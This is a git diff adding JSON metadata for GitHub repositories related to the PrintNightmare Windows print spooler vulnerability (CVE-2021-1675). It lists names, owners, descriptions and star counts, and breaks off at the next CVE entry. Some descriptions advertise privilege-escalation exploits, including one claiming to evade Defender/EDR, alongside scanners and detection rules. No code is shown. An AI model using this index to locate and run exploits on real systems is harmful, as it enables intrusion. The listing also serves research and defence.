"https:\/\/github.com\/Leonidus0x10\/CVE-2021-1675-SCANNER", + "description": "Vulnerability Scanner for CVE-2021-1675\/PrintNightmare", + "fork": false, + "created_at": "2021-07-02T01:45:00Z", + "updated_at": "2024-08-24T16:05:02Z", + "pushed_at": "2021-07-02T01:52:46Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-1675", + "exploit", + "hacktheplanet", + "python", + "scanner" + ], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 382249207, + "name": "CVE-2021-1675", + "full_name": "thomasgeens\/CVE-2021-1675", + "owner": { + "login": "thomasgeens", + "id": 2236721, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2236721?v=4", + "html_url": "https:\/\/github.com\/thomasgeens", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thomasgeens\/CVE-2021-1675", + "description": null, + "fork": false, + "created_at": "2021-07-02T06:14:29Z", + "updated_at": "2024-08-12T20:14:23Z", + "pushed_at": "2021-07-02T06:14:39Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 382266932, + "name": "CVE-2021-1675_CarbonBlack_HuntingQuery", + "full_name": "mrezqi\/CVE-2021-1675_CarbonBlack_HuntingQuery", + "owner": { + "login": "mrezqi", + "id": 2455832, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2455832?v=4", + "html_url": "https:\/\/github.com\/mrezqi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mrezqi\/CVE-2021-1675_CarbonBlack_HuntingQuery", + "description": null, + "fork": false, + "created_at": "2021-07-02T07:30:24Z", + "updated_at": "2024-08-12T20:14:24Z", + "pushed_at": "2021-07-02T08:01:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 382399375, + "name": "CVE-2021-1675-PrintNightmare", + "full_name": "killtr0\/CVE-2021-1675-PrintNightmare", + "owner": { + "login": "killtr0", + "id": 22793707, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22793707?v=4", + "html_url": "https:\/\/github.com\/killtr0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/killtr0\/CVE-2021-1675-PrintNightmare", + "description": null, + "fork": false, + "created_at": "2021-07-02T16:12:15Z", + "updated_at": "2024-08-12T20:14:25Z", + "pushed_at": "2021-07-02T16:12:59Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 382407157, + "name": "CVE-2021-1675", + "full_name": "corelight\/CVE-2021-1675", + "owner": { + "login": "corelight", + "id": 21672558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4", + "html_url": "https:\/\/github.com\/corelight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corelight\/CVE-2021-1675", + "description": null, + "fork": false, + "created_at": "2021-07-02T16:44:24Z", + "updated_at": "2024-10-12T10:29:08Z", + "pushed_at": "2024-09-03T18:23:07Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 9, + "score": 0, + "subscribers_count": 11 + }, + { + "id": 382418030, + "name": "CVE-2021-1675", + "full_name": "kougyokugentou\/CVE-2021-1675", + "owner": { + "login": "kougyokugentou", + "id": 41278462, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41278462?v=4", + "html_url": "https:\/\/github.com\/kougyokugentou", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kougyokugentou\/CVE-2021-1675", + "description": "A small powershell script to disable print spooler service using desired state configuration", + "fork": false, + "created_at": "2021-07-02T17:29:04Z", + "updated_at": "2021-12-22T20:12:23Z", + "pushed_at": "2021-07-02T17:40:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 382425733, + "name": "CVE-2021-1675", + "full_name": "ptter23\/CVE-2021-1675", + "owner": { + "login": "ptter23", + "id": 55167410, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55167410?v=4", + "html_url": "https:\/\/github.com\/ptter23", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ptter23\/CVE-2021-1675", + "description": "CVE-2021-1675: ZERO-DAY VULNERABILITY IN WINDOWS PRINTER SERVICE WITH AN EXPLOIT AVAILABLE IN ALL OPERATING SYSTEM VERSIONS", + "fork": false, + "created_at": "2021-07-02T18:01:21Z", + "updated_at": "2024-08-12T20:14:25Z", + "pushed_at": "2021-07-02T18:07:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 382496518, + "name": "cve-2021-1675-printnightmare", + "full_name": "initconf\/cve-2021-1675-printnightmare", + "owner": { + "login": "initconf", + "id": 4044729, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4044729?v=4", + "html_url": "https:\/\/github.com\/initconf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/initconf\/cve-2021-1675-printnightmare", + "description": "to catch cve-2021-1675-printnightmare", + "fork": false, + "created_at": "2021-07-03T01:04:06Z", + "updated_at": "2024-08-12T20:14:25Z", + "pushed_at": "2021-07-03T01:08:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 382609559, + "name": "PrintNightmare", + "full_name": "ozergoker\/PrintNightmare", + "owner": { + "login": "ozergoker", + "id": 86879266, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86879266?v=4", + "html_url": "https:\/\/github.com\/ozergoker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ozergoker\/PrintNightmare", + "description": "Windows Print Spooler Service RCE CVE-2021-1675 (PrintNightmare)", + "fork": false, + "created_at": "2021-07-03T12:25:21Z", + "updated_at": "2024-08-12T20:14:26Z", + "pushed_at": "2021-07-03T12:43:26Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 382815972, + "name": "PrintNightmare-CVE-2021-1675", + "full_name": "exploitblizzard\/PrintNightmare-CVE-2021-1675", + "owner": { + "login": "exploitblizzard", + "id": 61627070, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61627070?v=4", + "html_url": "https:\/\/github.com\/exploitblizzard", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exploitblizzard\/PrintNightmare-CVE-2021-1675", + "description": "Youtube : https:\/\/youtu.be\/Zr0KjYDSFKQ", + "fork": false, + "created_at": "2021-07-04T09:50:39Z", + "updated_at": "2024-08-12T20:14:26Z", + "pushed_at": "2021-07-04T09:57:46Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 383128850, + "name": "CVE-2021-1675", + "full_name": "edsonjt81\/CVE-2021-1675", + "owner": { + "login": "edsonjt81", + "id": 27496739, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27496739?v=4", + "html_url": "https:\/\/github.com\/edsonjt81", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/edsonjt81\/CVE-2021-1675", + "description": null, + "fork": false, + "created_at": "2021-07-05T12:10:43Z", + "updated_at": "2024-08-12T20:14:28Z", + "pushed_at": "2022-12-27T14:15:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 383165321, + "name": "PrintNightmare-LPE", + "full_name": "sailay1996\/PrintNightmare-LPE", + "owner": { + "login": "sailay1996", + "id": 16739401, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16739401?v=4", + "html_url": "https:\/\/github.com\/sailay1996", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sailay1996\/PrintNightmare-LPE", + "description": "CVE-2021-1675 (PrintNightmare)", + "fork": false, + "created_at": "2021-07-05T14:17:03Z", + "updated_at": "2024-10-28T02:25:11Z", + "pushed_at": "2021-07-05T14:34:34Z", + "stargazers_count": 74, + "watchers_count": 74, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "local-privilege-escalation", + "printnightmare", + "windows-exploitation", + "windows-privilege-escalation" + ], + "visibility": "public", + "forks": 29, + "watchers": 74, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 383728669, + "name": "PrintNightmare", + "full_name": "JumpsecLabs\/PrintNightmare", + "owner": { + "login": "JumpsecLabs", + "id": 49488209, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49488209?v=4", + "html_url": "https:\/\/github.com\/JumpsecLabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JumpsecLabs\/PrintNightmare", + "description": "Information on the Windows Spooler vulnerability - CVE-2021-1675; CVE 2021 34527", + "fork": false, + "created_at": "2021-07-07T08:32:09Z", + "updated_at": "2024-08-24T16:04:57Z", + "pushed_at": "2021-07-12T09:28:16Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 384183711, + "name": "CVE-2021-1675-Yara", + "full_name": "bartimusprimed\/CVE-2021-1675-Yara", + "owner": { + "login": "bartimusprimed", + "id": 465079, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/465079?v=4", + "html_url": "https:\/\/github.com\/bartimusprimed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bartimusprimed\/CVE-2021-1675-Yara", + "description": null, + "fork": false, + "created_at": "2021-07-08T16:18:52Z", + "updated_at": "2024-08-12T20:14:33Z", + "pushed_at": "2021-07-08T16:19:45Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 384854320, + "name": "cve-2021-1675", + "full_name": "k8gege\/cve-2021-1675", + "owner": { + "login": "k8gege", + "id": 42312878, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42312878?v=4", + "html_url": "https:\/\/github.com\/k8gege", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k8gege\/cve-2021-1675", + "description": null, + "fork": false, + "created_at": "2021-07-11T03:48:25Z", + "updated_at": "2024-08-12T20:14:37Z", + "pushed_at": "2021-07-11T03:49:44Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 16, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 385174791, + "name": "PrintNightmare-CVE-2021-1675-CVE-2021-34527", + "full_name": "galoget\/PrintNightmare-CVE-2021-1675-CVE-2021-34527", + "owner": { + "login": "galoget", + "id": 8353133, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8353133?v=4", + "html_url": "https:\/\/github.com\/galoget", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/galoget\/PrintNightmare-CVE-2021-1675-CVE-2021-34527", + "description": "CVE-2021-1675 \/ CVE-2021-34527 - PrintNightmare Python, C# and PowerShell Exploits Implementations (LPE & RCE)", + "fork": false, + "created_at": "2021-07-12T08:18:40Z", + "updated_at": "2024-08-12T20:14:38Z", + "pushed_at": "2021-07-12T08:35:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 386724774, + "name": "Microsoft-CVE-2021-1675", + "full_name": "thalpius\/Microsoft-CVE-2021-1675", + "owner": { + "login": "thalpius", + "id": 49958238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49958238?v=4", + "html_url": "https:\/\/github.com\/thalpius", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thalpius\/Microsoft-CVE-2021-1675", + "description": null, + "fork": false, + "created_at": "2021-07-16T18:06:05Z", + "updated_at": "2024-05-27T19:04:19Z", + "pushed_at": "2024-05-27T19:04:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 387202198, + "name": "Microsoft-CVE-2021-1675", + "full_name": "zha0\/Microsoft-CVE-2021-1675", + "owner": { + "login": "zha0", + "id": 5314165, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5314165?v=4", + "html_url": "https:\/\/github.com\/zha0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zha0\/Microsoft-CVE-2021-1675", + "description": null, + "fork": false, + "created_at": "2021-07-18T15:00:27Z", + "updated_at": "2021-12-07T10:08:12Z", + "pushed_at": "2021-07-18T14:03:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 387694592, + "name": "CVE-2021-1675", + "full_name": "Winter3un\/CVE-2021-1675", + "owner": { + "login": "Winter3un", + "id": 12570968, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12570968?v=4", + "html_url": "https:\/\/github.com\/Winter3un", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Winter3un\/CVE-2021-1675", + "description": null, + "fork": false, + "created_at": "2021-07-20T06:26:45Z", + "updated_at": "2024-08-12T20:14:50Z", + "pushed_at": "2021-07-20T06:46:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 388427598, + "name": "my-CVE-2021-1675", + "full_name": "hahaleyile\/my-CVE-2021-1675", + "owner": { + "login": "hahaleyile", + "id": 38727644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38727644?v=4", + "html_url": "https:\/\/github.com\/hahaleyile", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hahaleyile\/my-CVE-2021-1675", + "description": "see https:\/\/github.com\/cube0x0\/CVE-2021-1675", + "fork": false, + "created_at": "2021-07-22T10:49:30Z", + "updated_at": "2024-08-12T20:14:53Z", + "pushed_at": "2021-08-13T15:15:05Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 402035048, + "name": "CVE-2021-1675_RDL_LPE", + "full_name": "mstxq17\/CVE-2021-1675_RDL_LPE", + "owner": { + "login": "mstxq17", + "id": 29624427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29624427?v=4", + "html_url": "https:\/\/github.com\/mstxq17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mstxq17\/CVE-2021-1675_RDL_LPE", + "description": "PrintNightMare LPE提权漏洞的CS 反射加载插件。开箱即用、通过内存加载、混淆加载的驱动名称来ByPass Defender\/EDR。", + "fork": false, + "created_at": "2021-09-01T11:25:04Z", + "updated_at": "2024-09-21T12:07:12Z", + "pushed_at": "2021-09-01T11:25:22Z", + "stargazers_count": 147, + "watchers_count": 147, + "has_discussions": false, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 26, + "watchers": 147, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 410565318, + "name": "PrintNightmare", + "full_name": "ly4k\/PrintNightmare", + "owner": { + "login": "ly4k", + "id": 53348818, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53348818?v=4", + "html_url": "https:\/\/github.com\/ly4k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ly4k\/PrintNightmare", + "description": "Python implementation for PrintNightmare (CVE-2021-1675 \/ CVE-2021-34527)", + "fork": false, + "created_at": "2021-09-26T13:53:10Z", + "updated_at": "2024-11-26T06:33:17Z", + "pushed_at": "2021-10-17T13:29:56Z", + "stargazers_count": 182, + "watchers_count": 182, + "has_discussions": false, + "forks_count": 30, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-1675", + "cve-2021-34527" + ], + "visibility": "public", + "forks": 30, + "watchers": 182, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 410658843, + "name": "SharpPN", + "full_name": "Wra7h\/SharpPN", + "owner": { + "login": "Wra7h", + "id": 60988551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60988551?v=4", + "html_url": "https:\/\/github.com\/Wra7h", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wra7h\/SharpPN", + "description": "C# PrintNightmare (CVE-2021-1675)", + "fork": false, + "created_at": "2021-09-26T20:46:23Z", + "updated_at": "2024-08-12T20:16:45Z", + "pushed_at": "2021-09-26T22:35:07Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 413951914, + "name": "CVE-2021-1675-PrintNightmare", + "full_name": "OppressionBreedsResistance\/CVE-2021-1675-PrintNightmare", + "owner": { + "login": "OppressionBreedsResistance", + "id": 60150959, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60150959?v=4", + "html_url": "https:\/\/github.com\/OppressionBreedsResistance", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OppressionBreedsResistance\/CVE-2021-1675-PrintNightmare", + "description": "Working PowerShell POC", + "fork": false, + "created_at": "2021-10-05T19:24:23Z", + "updated_at": "2024-08-12T20:16:59Z", + "pushed_at": "2021-10-06T21:04:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 435194981, + "name": "NimNightmare", + "full_name": "eversinc33\/NimNightmare", + "owner": { + "login": "eversinc33", + "id": 51821028, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51821028?v=4", + "html_url": "https:\/\/github.com\/eversinc33", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eversinc33\/NimNightmare", + "description": "CVE-2021-1675 LPE PoC in Nim (PrintNightmare Local Privilege Escalation)", + "fork": false, + "created_at": "2021-12-05T14:49:32Z", + "updated_at": "2024-09-25T08:35:59Z", + "pushed_at": "2021-12-05T14:51:28Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 19, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 453589665, + "name": "CVE-2021-1675", + "full_name": "AndrewTrube\/CVE-2021-1675", + "owner": { + "login": "AndrewTrube", + "id": 53106750, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53106750?v=4", + "html_url": "https:\/\/github.com\/AndrewTrube", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AndrewTrube\/CVE-2021-1675", + "description": "PrintNightmare Local Privilege Escalation ", + "fork": false, + "created_at": "2022-01-30T04:47:44Z", + "updated_at": "2024-10-04T01:08:42Z", + "pushed_at": "2022-01-30T04:54:23Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 462124046, + "name": "cube0x0-CVE-2021-1675", + "full_name": "TheJoyOfHacking\/cube0x0-CVE-2021-1675", + "owner": { + "login": "TheJoyOfHacking", + "id": 99463221, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99463221?v=4", + "html_url": "https:\/\/github.com\/TheJoyOfHacking", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheJoyOfHacking\/cube0x0-CVE-2021-1675", + "description": null, + "fork": false, + "created_at": "2022-02-22T03:32:14Z", + "updated_at": "2022-02-22T03:32:28Z", + "pushed_at": "2022-02-22T03:32:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 462124130, + "name": "calebstewart-CVE-2021-1675", + "full_name": "TheJoyOfHacking\/calebstewart-CVE-2021-1675", + "owner": { + "login": "TheJoyOfHacking", + "id": 99463221, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99463221?v=4", + "html_url": "https:\/\/github.com\/TheJoyOfHacking", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheJoyOfHacking\/calebstewart-CVE-2021-1675", + "description": null, + "fork": false, + "created_at": "2022-02-22T03:32:34Z", + "updated_at": "2023-10-31T18:19:03Z", + "pushed_at": "2022-02-22T03:32:45Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 557145507, + "name": "cve-2021-1675", + "full_name": "jj4152\/cve-2021-1675", + "owner": { + "login": "jj4152", + "id": 115718872, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115718872?v=4", + "html_url": "https:\/\/github.com\/jj4152", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jj4152\/cve-2021-1675", + "description": null, + "fork": false, + "created_at": "2022-10-25T06:47:20Z", + "updated_at": "2022-10-25T06:55:39Z", + "pushed_at": "2022-11-07T12:26:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 582828686, + "name": "PrintNightmare", + "full_name": "r1skkam\/PrintNightmare", + "owner": { + "login": "r1skkam", + "id": 58542375, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58542375?v=4", + "html_url": "https:\/\/github.com\/r1skkam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r1skkam\/PrintNightmare", + "description": "Learn about the vulnerability known as PrintNightmare (CVE-2021-1675) and (CVE-2021-34527)", + "fork": false, + "created_at": "2022-12-28T01:29:31Z", + "updated_at": "2022-12-28T01:29:31Z", + "pushed_at": "2022-12-29T10:14:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 744694326, + "name": "PNCVE-Win10-20H2-Exploit", + "full_name": "peckre\/PNCVE-Win10-20H2-Exploit", + "owner": { + "login": "peckre", + "id": 97857297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97857297?v=4", + "html_url": "https:\/\/github.com\/peckre", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/peckre\/PNCVE-Win10-20H2-Exploit", + "description": "A one-click script to gain a System privileges command line in Windows 10 20H2 that exploits CVE-2021-1675", + "fork": false, + "created_at": "2024-01-17T20:22:29Z", + "updated_at": "2024-01-17T20:29:40Z", + "pushed_at": "2024-01-17T21:51:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 756532685, + "name": "CVE-2021-1675-CVE-2021-34527", + "full_name": "whoami-chmod777\/CVE-2021-1675-CVE-2021-34527", + "owner": { + "login": "whoami-chmod777", + "id": 33582093, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33582093?v=4", + "html_url": "https:\/\/github.com\/whoami-chmod777", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whoami-chmod777\/CVE-2021-1675-CVE-2021-34527", + "description": null, + "fork": false, + "created_at": "2024-02-12T20:54:51Z", + "updated_at": "2024-03-06T16:11:54Z", + "pushed_at": "2024-02-12T20:54:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 756534030, + "name": "CVE-2021-1675---PrintNightmare-LPE-PowerShell-", + "full_name": "whoami-chmod777\/CVE-2021-1675---PrintNightmare-LPE-PowerShell-", + "owner": { + "login": "whoami-chmod777", + "id": 33582093, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33582093?v=4", + "html_url": "https:\/\/github.com\/whoami-chmod777", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whoami-chmod777\/CVE-2021-1675---PrintNightmare-LPE-PowerShell-", + "description": null, + "fork": false, + "created_at": "2024-02-12T20:59:08Z", + "updated_at": "2024-02-12T20:59:21Z", + "pushed_at": "2024-02-12T20:59:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810761849, + "name": "Windows_Exploit", + "full_name": "0xSs0rZ\/Windows_Exploit", + "owner": { + "login": "0xSs0rZ", + "id": 53834222, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53834222?v=4", + "html_url": "https:\/\/github.com\/0xSs0rZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xSs0rZ\/Windows_Exploit", + "description": "CVE-2021-1675\/CVE-2021-34527 PrintNightmare & CVE-2020-0668", + "fork": false, + "created_at": "2024-06-05T10:01:18Z", + "updated_at": "2024-06-05T10:04:29Z", + "pushed_at": "2024-06-05T10:04:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-1678.json b/2021/CVE-2021-1678.json new file mode 100644 index 0000000000..1944c9351b --- /dev/null +++ b/2021/CVE-2021-1678.json @@ -0,0 +1,33 @@ +[ + { + "id": 800160544, + "name": "RpcAuthnLevelPrivacyEnabled", + "full_name": "alvaciroliveira\/RpcAuthnLevelPrivacyEnabled", + "owner": { + "login": "alvaciroliveira", + "id": 129803614, + "avatar_url": 